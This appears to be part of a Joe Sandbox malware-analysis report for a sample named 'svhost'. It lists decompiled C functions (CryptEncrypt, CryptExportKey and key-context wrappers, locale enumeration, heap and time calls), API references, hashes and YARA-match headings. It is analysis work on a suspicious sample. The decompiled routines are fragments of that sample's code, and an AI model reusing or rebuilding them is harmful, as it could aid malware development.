                                      • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?,00E65585,?,?,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E6561D
                                        • Part of subcall function 00E660D0: CryptDestroyKey.ADVAPI32(00000000,00000000,?,00E655BF,?,00000000,?,00E65585,?), ref: 00E660E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$ContextDestroyRelease
                                      • String ID:
                                      • API String ID: 1322390979-0
                                      • Opcode ID: 059303f2425525d05cc9bb8c4311d64d66b214d391c94e15e39829e47614aec2
                                      • Instruction ID: 227afee49eb8419a287fc6de111fd0d6c936c1e6c611a703b56b710f97d9e56b
                                      • Opcode Fuzzy Hash: 059303f2425525d05cc9bb8c4311d64d66b214d391c94e15e39829e47614aec2
                                      • Instruction Fuzzy Hash: CB11C674640208EFD704CF85D698B9DF7B2BB48308F248198E5056B391C776EE45DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E65D30 Relevance: 4.5, APIs: 3, Instructions: 43encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E00E65D30(intOrPtr __ecx) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t9;
				long _t11;

				_v12 = __ecx;
				_t9 = _v12;
				if( *((intOrPtr*)(_t9 + 8)) == 0) {
					__imp__CryptAcquireContextW(_v12 + 8, 0, 0, 0x18, 0);
					if(_t9 != 0) {
						return 1;
					}
					_t11 = GetLastError();
					if(_t11 != 0x80090016) {
						return 0;
					}
					__imp__CryptAcquireContextW(_v12 + 8, 0, 0, 0x18, 8);
					if(_t11 == 0) {
						_v5 = 0;
					} else {
						_v5 = 1;
					}
					return _v5;
				}
				return 1;
			}







                                      0x00e65d36
                                      0x00e65d39
                                      0x00e65d40
                                      0x00e65d55
                                      0x00e65d5d
                                      0x00000000
                                      0x00e65d98
                                      0x00e65d5f
                                      0x00e65d6a
                                      0x00000000
                                      0x00e65d94
                                      0x00e65d7b
                                      0x00e65d83
                                      0x00e65d8b
                                      0x00e65d85
                                      0x00e65d85
                                      0x00e65d85
                                      0x00000000
                                      0x00e65d8f
                                      0x00000000

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(00E55DD4,00000000,00000000,00000018,00000000,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D55
                                      • GetLastError.KERNEL32(?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D5F
                                      • CryptAcquireContextW.ADVAPI32(00000010,00000000,00000000,00000018,00000008,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D7B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AcquireContextCrypt$ErrorLast
                                      • String ID:
                                      • API String ID: 2779411412-0
                                      • Opcode ID: 622ff228466dd10b635fa4c3cffee029c42754d83c5e95280a11dcc82a8ac1e3
                                      • Instruction ID: f4af3ed286ed2e53f4dec6064fa5e6afd33baed686c986fbc187177148ef1f51
                                      • Opcode Fuzzy Hash: 622ff228466dd10b635fa4c3cffee029c42754d83c5e95280a11dcc82a8ac1e3
                                      • Instruction Fuzzy Hash: B40149317C8708FBD7104B50AC4EFEF3B605B5170AF105084E6017E1C1C2769849A761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E772E0 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,00E722CD,00E517EA,?,?,?,00E517EA,221CAC15), ref: 00E772F9
                                      • GetSystemTimeAsFileTime.KERNEL32(00E517EA,?,?,00E722CD,00E517EA,?,?,?,00E517EA,221CAC15), ref: 00E772FD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem$Precise
                                      • String ID:
                                      • API String ID: 743729956-0
                                      • Opcode ID: f7314946a8b9b68b614065fafc97ecb99b430ecde30ac4e24af3393c359d070a
                                      • Instruction ID: f91346754570005c0d203e1a383615364cbe226de9e3548bf11488bce5d1bc18
                                      • Opcode Fuzzy Hash: f7314946a8b9b68b614065fafc97ecb99b430ecde30ac4e24af3393c359d070a
                                      • Instruction Fuzzy Hash: 60D0A972905068AF8A022B8AFC148ACBB39AB48B113084029FA8972120CB2218169BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6F13F Relevance: 2.5, APIs: 2, Instructions: 7memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E6F13F() {
				void* _t5;

				return HeapFree(GetProcessHeap(), 0,  *(_t5 - 0x4c));
			}




                                      0x00e6f152

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E6F13D), ref: 00E6F145
                                      • HeapFree.KERNEL32(00000000), ref: 00E6F14C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 0ee0cd177f5280118fd8ddcafc17fe4a775862d47608c2092361521358479248
                                      • Instruction ID: f8e25f80f208d81fc27d079df23219ab122590c522d160e959649a282961c6ae
                                      • Opcode Fuzzy Hash: 0ee0cd177f5280118fd8ddcafc17fe4a775862d47608c2092361521358479248
                                      • Instruction Fuzzy Hash: E8B092B2950100AFDF049BE1EC2EF5D3A38BB44302F000114F206A20D08A61144ACB22
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB9297 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00EB9297(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E00EB0EFC(__ecx, __edx);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E00EB9391( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(0xeb93bd, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}
















                                      0x00eb92a4
                                      0x00eb92aa
                                      0x00eb92ab
                                      0x00eb92ae
                                      0x00eb92b1
                                      0x00eb92b1
                                      0x00eb92b4
                                      0x00eb92b6
                                      0x00eb92c4
                                      0x00eb92ca
                                      0x00eb92cd
                                      0x00eb92d0
                                      0x00eb92d0
                                      0x00eb92d3
                                      0x00eb92d5
                                      0x00eb92de
                                      0x00eb92e9
                                      0x00eb92ec
                                      0x00eb92f2
                                      0x00eb92fd
                                      0x00eb92fd
                                      0x00eb9306
                                      0x00eb9309
                                      0x00eb9311
                                      0x00eb9317
                                      0x00eb931b
                                      0x00eb9320
                                      0x00eb9324
                                      0x00eb9329
                                      0x00eb932b
                                      0x00000000
                                      0x00eb932b
                                      0x00eb9331

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • EnumSystemLocalesW.KERNEL32(00EB93BD,00000001,00000000,?,-00000050,?,00EB99EB,00000000,?,?,?,00000055,?), ref: 00EB9309
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem
                                      • String ID:
                                      • API String ID: 2417226690-0
                                      • Opcode ID: e30e7159dca0511055894a9a9cee9f67de055d37872ded84299aee338d86b143
                                      • Instruction ID: 9b94233dd5fc611a2f31ee75028767dc4656e1d7d81ec6623299bbed1b500ef8
                                      • Opcode Fuzzy Hash: e30e7159dca0511055894a9a9cee9f67de055d37872ded84299aee338d86b143
                                      • Instruction Fuzzy Hash: 941125366003015FDB189F39D8916FBB7D1FF80358B18842CEA86A7A41D371B842CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB9332 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB9332(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E00EB0EFC(__ecx, __edx);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E00EB9391( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(0xeb9610, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}









                                      0x00eb933f
                                      0x00eb9345
                                      0x00eb9346
                                      0x00eb9349
                                      0x00eb934c
                                      0x00eb934c
                                      0x00eb934f
                                      0x00eb9351
                                      0x00eb935f
                                      0x00eb9362
                                      0x00eb9365
                                      0x00eb9370
                                      0x00eb9370
                                      0x00eb9379
                                      0x00eb937c
                                      0x00eb9382
                                      0x00eb9388
                                      0x00eb938a
                                      0x00000000
                                      0x00eb938a
                                      0x00eb9390

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • EnumSystemLocalesW.KERNEL32(00EB9610,00000001,00000001,?,-00000050,?,00EB99AF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00EB937C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem
                                      • String ID:
                                      • API String ID: 2417226690-0
                                      • Opcode ID: bb90879eec411caa07653583f17338dfa30a2789853ada4476b0ae49b748e181
                                      • Instruction ID: ace8610997af1118c50adfe0f3a2269cd2a57bb46054596ac1cbada98a04e5d8
                                      • Opcode Fuzzy Hash: bb90879eec411caa07653583f17338dfa30a2789853ada4476b0ae49b748e181
                                      • Instruction Fuzzy Hash: 70F0F6362003045FDB245F799881ABB7BD1EF81368F19842DFB46AB6D1D671AC42C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E661A0 Relevance: 1.5, APIs: 1, Instructions: 40encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00E661A0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				char _v16;
				char _v17;
				intOrPtr _v24;
				signed int _t13;
				intOrPtr _t18;
				signed int _t26;

				_t13 =  *0xeef074; // 0x221cac15
				 *[fs:0x0] =  &_v16;
				_v24 = __ecx;
				_t18 = _a4;
				__imp__CryptEncrypt(_t18, 0, _a8 & 0x000000ff, 0, E00E634C0(_a12, 0),  &_a16, _a20, _t13 ^ _t26,  *[fs:0x0], 0xec0490, 0xffffffff);
				if(_t18 == 0) {
					_v17 = 0;
				} else {
					_v17 = 1;
				}
				 *[fs:0x0] = _v16;
				return _v17;
			}









                                      0x00e661b4
                                      0x00e661bf
                                      0x00e661c5
                                      0x00e661e4
                                      0x00e661e8
                                      0x00e661f0
                                      0x00e661f8
                                      0x00e661f2
                                      0x00e661f2
                                      0x00e661f2
                                      0x00e66202
                                      0x00e6620d

                                      APIs
                                      • CryptEncrypt.ADVAPI32(00000001,00000000,221CAC15,00000000,00000000,00000000,?,?,221CAC15,00000001,00000000,00000000,221CAC15), ref: 00E661E8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptEncrypt
                                      • String ID:
                                      • API String ID: 1352496322-0
                                      • Opcode ID: 92301a941e5c036af399682a7fba3400fa1940a29adf5fee5d22c9b5463fe900
                                      • Instruction ID: 80a530467fece4b7984eeeea3e4665a2a8a59e0a592e36096a3b34a15ed68f71
                                      • Opcode Fuzzy Hash: 92301a941e5c036af399682a7fba3400fa1940a29adf5fee5d22c9b5463fe900
                                      • Instruction Fuzzy Hash: B101A271948288AFDB01CFA8DC11FABBBBCEB05740F008169F915AB3C1C635990087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E66210 Relevance: 1.5, APIs: 1, Instructions: 37encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00E66210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				char _v16;
				char _v17;
				intOrPtr _v24;
				signed int _t11;
				void* _t15;
				signed int _t22;

				_t11 =  *0xeef074; // 0x221cac15
				 *[fs:0x0] =  &_v16;
				_v24 = __ecx;
				_t15 = E00E634C0(_a8, 0);
				__imp__CryptExportKey(_a4, 0, 8, 0, _t15,  &_a12, _t11 ^ _t22,  *[fs:0x0], 0xec0490, 0xffffffff);
				if(_t15 == 0) {
					_v17 = 0;
				} else {
					_v17 = 1;
				}
				 *[fs:0x0] = _v16;
				return _v17;
			}









                                      0x00e66224
                                      0x00e6622f
                                      0x00e66235
                                      0x00e66241
                                      0x00e66251
                                      0x00e66259
                                      0x00e66261
                                      0x00e6625b
                                      0x00e6625b
                                      0x00e6625b
                                      0x00e6626b
                                      0x00e66276

                                      APIs
                                      • CryptExportKey.ADVAPI32(?,00000000,00000008,00000000,00000000,00000000,?,221CAC15,?,00000000,221CAC15), ref: 00E66251
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptExport
                                      • String ID:
                                      • API String ID: 3389274496-0
                                      • Opcode ID: 6bf78e9744c37c54338b584c24e3e4bc694bb78d6e0db1653196a2733665c9f5
                                      • Instruction ID: c441e45dca14e99a2eeeea11804372611c18cd3fd207b56d90ddba9b5a5eed57
                                      • Opcode Fuzzy Hash: 6bf78e9744c37c54338b584c24e3e4bc694bb78d6e0db1653196a2733665c9f5
                                      • Instruction Fuzzy Hash: C601A471A88288EFD711CF64EC11FAABBBCE704B50F008269F915BB2C0CA75A5048750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB115C Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB115C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				E00E8AA70(__ebx, __edi, __esi, 0xeed7f8, 0xc);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E00EA5B71( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0xef3738 = E00EA5638( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(0xeb114f, 1);
				_t17 =  *0xeef074; // 0x221cac15
				 *0xef3738 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E00EB11CC();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}






                                      0x00eb1163
                                      0x00eb1168
                                      0x00eb1171
                                      0x00eb1177
                                      0x00eb1188
                                      0x00eb119a
                                      0x00eb119c
                                      0x00eb11a1
                                      0x00eb11a6
                                      0x00eb11a9
                                      0x00eb11b0
                                      0x00eb11ba
                                      0x00eb11c6

                                      APIs
                                        • Part of subcall function 00EA5B71: EnterCriticalSection.KERNEL32(-00EF33B8,?,00EAD158,00000000,00EED650,0000000C,00EAD11F,?,?,00EB04F5,?,?,00EB109F,00000001,00000364,00000006), ref: 00EA5B80
                                      • EnumSystemLocalesW.KERNEL32(00EB114F,00000001,00EED7F8,0000000C,00EB157A,00000000), ref: 00EB1194
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: bc9e70ca60695c96437191543dffb398dd45ac21994ace6760b636db3a3d07be
                                      • Instruction ID: df314662c76301f8f167840de702bc926f867b1bf5c90eed5c564200627c7755
                                      • Opcode Fuzzy Hash: bc9e70ca60695c96437191543dffb398dd45ac21994ace6760b636db3a3d07be
                                      • Instruction Fuzzy Hash: C5F037B6A01204EFD700EFA9E882BAAB7E0EB49721F10516AF510EB2E0D6755944CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB924C Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB924C(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;

				_t19 = E00EB0EFC(__ecx, __edx);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0xeb91a5, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}








                                      0x00eb9258
                                      0x00eb925c
                                      0x00eb925f
                                      0x00eb9262
                                      0x00eb9262
                                      0x00eb9265
                                      0x00eb9268
                                      0x00eb9280
                                      0x00eb9283
                                      0x00eb9289
                                      0x00eb928f
                                      0x00eb9291
                                      0x00000000
                                      0x00eb9291
                                      0x00eb9296

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • EnumSystemLocalesW.KERNEL32(00EB91A5,00000001,00000001,?,?,00EB9A0D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EB9283
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
